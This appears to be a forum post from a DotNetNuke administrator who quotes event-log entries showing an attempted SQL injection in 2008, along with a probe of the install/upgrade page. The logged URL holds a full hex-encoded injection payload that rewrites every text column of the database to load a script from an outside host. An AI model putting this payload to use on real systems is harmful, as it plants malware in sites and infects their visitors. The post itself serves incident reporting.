Hi all, I was poking around DNN's event log and noticed this...
Looks like somebody is attempting sql injection, or at the least being an annoyance.
AssemblyVersion: 04.08.04
PortalID: -1
PortalName:
UserID: -1
UserName:
ActiveTabID: -1
ActiveTabName:
RawURL: /LinkClick.aspx?fileticket=wCazDxFeyZU%3D&tabid=870&mid=1335';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
AbsoluteURL: /LinkClick.aspx
AbsoluteURLReferrer:
UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
DefaultDataProvider: DotNetNuke.Data.SqlDataProvider, DotNetNuke.SqlDataProvider
ExceptionGUID: 9f95910a-ab71-4864-9a6e-77e3021f681b
InnerException: Unhandled Error:
FileName:
FileLineNumber: 0
FileColumnNumber: 0
Method: System.Number.StringToNumber
StackTrace:
Message: System.Exception: Unhandled Error: ---> System.formatException: Input string was not in a correct format. at System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberformatInfo info, Boolean parseDecimal) at System.Number.ParseInt32(String s, NumberStyles style, NumberformatInfo info) at DotNetNuke.Common.Globals.IsAdminSkin(Boolean IsAdminTab) at DotNetNuke.Entities.Portals.PortalSettings.GetPortalSettings(Int32 TabId, PortalAliasInfo objPortalAliasInfo) at DotNetNuke.Entities.Portals.PortalSettings..ctor(Int32 tabId, PortalAliasInfo objPortalAliasInfo) at DotNetNuke.HttpModules.UrlRewriteModule.OnBeginRequest(Object s, EventArgs e) at System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) --- End of inner exception stack trace ---
Source:
Server Name: XXXXXXX
Then found this in Event Viewer Application log
Event code: 4011
Event message: An unhandled access exception has occurred.
Event time: 8/20/2008 11:46:37 AM
Event time (UTC): 8/20/2008 6:46:37 PM
Event ID: d09ccea02b924525b3a87a9206bb9873
Event sequence: 19
Event occurrence: 1
Event detail code: 0
Application information:
Application domain: /LM/W3SVC/1/ROOT-1-128637315731568032
Trust level: Full
Application Virtual Path: /
Application Path: c:\inetpub\wwwroot\xxxx\
Machine name: xxxxxxxxx
Process information:
Process ID: 1888
Process name: w3wp.exe
Account name: NT AUTHORITY\NETWORK SERVICE
Request information:
Request URL: http://xxxxxxxx/Install/Install.aspx?mode=upgrade
Request path: /Install/Install.aspx
User host address: 216.155.220.110
User:
Is authenticated: False
Authentication Type:
Thread account name: NT AUTHORITY\NETWORK SERVICE
Custom event details:
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.